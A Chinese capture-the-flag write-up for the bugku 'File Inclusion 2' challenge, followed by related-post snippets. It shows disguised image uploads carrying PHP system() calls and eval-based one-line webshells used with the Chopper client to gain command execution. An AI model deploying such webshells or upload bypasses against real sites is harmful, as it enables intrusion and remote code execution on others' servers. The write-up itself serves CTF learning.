2. 程式人生 > >bugku-檔案包含2(檔案包含漏洞)

bugku-檔案包含2(檔案包含漏洞)

阿新 發佈:2018-11-25

本文介紹三種方法,還會講到這道題菜刀的連線。 

進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面

 

 

方法一:

新建一個txt檔案寫入  <script language=php>system("ls")</script>  後另存為 jpg 格式

選擇瀏覽上傳檔案

訪問 儲存進去的檔案 即 Save in 後面的圖片路徑

因為我們寫入了ls命令,用於顯示當前目錄下所有檔案,發現了flag檔案

然後訪問:http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt

 

方法二:一句話木馬

不需要上傳什麼檔案,直接upload然後抓包:

然後ctrl+r傳送到reperter裡面,傳入一句話木馬 <?=eval($_POST['pass']);>

改動如下:(在request修改完點go會在response返顯)

複製resonse返顯資訊修改url:

正常應該是返回空白。但是菜刀連線時顯示500 Internal server error 也是沒脾氣了。

 

 

方法三:一句話木馬,連線菜刀

我們將方法二的一句話改成下面這個:

<script language=php>echo 'a'; eval($_POST['pass']);</script>

這種方法會返回a。並且菜刀連線成功。

That's all.

相關推薦

bugku-檔案包含2(檔案包含漏洞)

本文介紹三種方法,還會講到這道題菜刀的連線。  進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面     方法一: ①新建一個txt檔案寫入  <script l

【unix學習】檔案處理2檔案sort、cut命令

檔案sort、cut命令 檔案排序-sort sort Ordering a set of items according to some criteria options b Ignore leading blanks f

bugku-Web 檔案包含2

開啟網頁檢視原始碼,在最上面發現upload.php,於是我們就訪問這個檔案:http://123.206.31.85:49166/index.php?file=upload.php 發現是讓我們上傳檔案,然而,我們上傳了並沒什麼用,但是下面說出了檔案的位置。 這裡我們構造一個檔案再上傳

bugku-檔案包含2 writeup

檔案包含2 flag格式:SKCTF{xxxxxxxxxxxxxxxx} hint:檔案包含 2.將hello.php改成upload.php,訪問 這裡對上傳的檔案的格式和大小做了限制 3.上傳一個圖片馬,burpsuite抓包改字尾為.

BugKuCTF套路滿滿的題--------檔案包含2

首先講一下這道題的思路,檔案包含,什麼是檔案包含?其實簡單來說就是通過一個檔案傳入引數(構造語句)去訪問另一個檔案,從而得到你所想要的東西。 然而,這道題,除了檔案包含的知識。還涉及到了檔案上傳的知識。畢竟,這兩者總是相互存在在。。。。。 好了,接下來,開始解題: 首先進入的介面是一個歡

57. 檔案包含篇——檔案包含漏洞原理解析

定義:在通過PHP的函式引入檔案時,由於傳入的檔名沒有經過合理的校驗,從而操作了預想之外的檔案,導致意外的檔案洩露甚至惡意的程式碼注入。程式開發人員通常會把可重複使用的函式寫到單個檔案中,在使用某些函式時,直接呼叫此檔案,而無須再次編寫,這種呼叫檔案的過程一般被稱為包含。程式

C語言:解決多個C檔案包含同一標頭檔案引起的檔案重複包含問題

解決多個C檔案包含同一標頭檔案引起的檔案重複包含問題,並給出全域性變數如何定義和宣告的方法. 解決方法: 1. 定義公共檔案: global.c 和global.h 其中, global.c檔案中: #include "global.h" //定義全域性變數 int g

C檔案包含.h檔案包含.c檔案總結

原文連結:http://blog.csdn.net/yangtalent1206/article/details/6830051        很多人對C語言中的 “檔案包含”都不陌生了,檔案包含處理在程式開發中會給我們的模組化程式設計帶來很大的好處

DVWA_File Inclusion 檔案包含 遠端檔案包含拿webshell

    MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );

maven打包不包含配置檔案

如果使用maven-jar-plugin和maven-dependency-plugin打包,排除配置檔案的方法: 上面的配置是把resources下的配置檔案不打進專案的jar包中,主要使用的是<excludes>(排除),如果想把resources下的部分配置打進去,可

Java讀取CSV檔案(CSV檔案資料內容包含逗號處理)

文章目錄 0. 前言 1. 解決方案 2. 程式碼片段 0. 前言 最近在公司寫專案時,有個匯入csv格式檔案資料的需求。Java讀取csv檔案時預設是按照 ,[英文逗號]分割的

c# 後臺post,包含file檔案

http request 相關 private bool Upload(KeyValuePair<string, string>[] paramString,Stream paramFileStream) { var actionUr

使用python實現RSA加解密演算法(包含讀取檔案操作),檔案內容為16進位制字串,同時實現對學號姓名的加密——(SCU應用密碼學實驗)

#-*- coding:UTF-8 -*- ''' time: 2018-5-30 content:RSA python 3.6 mac os ''' from random import randint import random im

SVN包含非法檔案系統格式選項/包含非法檔案系統格式選項

一、Error: “I:\svnServerPath\db\format”包含非法檔案系統格式選項"addressing logical" 使用的subversion(比如1.6)和TortoiseSVN(比如1.9.7)版本不配套 解決方法:升級subversion 二、Error:

好壓開啟包含solidworks檔案的壓縮包時非常卡頓

        在裝有solidworks的電腦上,用好壓開啟包含solidworks檔案(字尾為sldprt和sldasm)的壓縮包時,非常卡頓,拖動好壓視窗或者拖動滾動條,5秒以上才能反應過來,整個作業系統速度都會被拖得非常慢(絕不是因為不是電腦配置過低),關掉好壓後,系

gitignore 例子 只包含特定檔案

git工程只上傳必須的檔案,所以需要在一個檔案(跟目錄.gitignore)下面記錄需要忽略的檔案或資料夾。下面舉例.gitignore, 該模版適合去除一些指定目錄,並且僅僅包含其他目錄下的特定結尾的檔案: *!/**/##去除哪些路徑/dirignore1//dirignore2/##

Navicat 的檔案匯入匯出(包含查詢結果的匯出)

一、資料的匯入 1、在navicat中先新建一個數據表hrms_org 2、現從外部匯入相應的資料,先選中表,點選“匯入”。 3、選擇要匯入的檔案格式,此處以csv格式為例。 4、選擇要匯入檔案的路徑。 5、點選“下一步”。 6、確認源表與目

javaweb實現檔案下載(包含.txt檔案等預設在瀏覽器中開啟的檔案

檔案下載  剛開始研究檔案下載是找有關js的方法,找了好多發現對於.txt、.xls等檔案在瀏覽器中還是開啟,或者就是跨域問題。後來通過查詢資料發現可以在後臺對http相應頭設定引數,而且實現起來也不復雜。現總結如下: 文章參考 《javaweb檔案下載》、《根據網路url 實現w

maven-war-plugin:Maven打war包時,排除和包含指定檔案或目錄

通過使用<packagingIncludes>和<packagingExcludes>配置引數,可以在WAR檔案中包含或排除某些檔案或者目錄。 可以通過逗號分隔,配置多個檔案或者目錄路徑。 使用**等萬用字元表示多個目錄,使用*表示檔案或目錄名稱的可選

檔案包含檔案上傳組合拳

Target www.xxxxx.com 資訊蒐集 (1)埠掃描 目標開放埠 略 (2)探測服務 80 web 8080 web 8088 web (3)路徑掃描 略 (4)漏洞探測 通過對web服務進行探測,發現8080埠存在檔案包含漏洞,查看回顯自動添加了page_字首和php字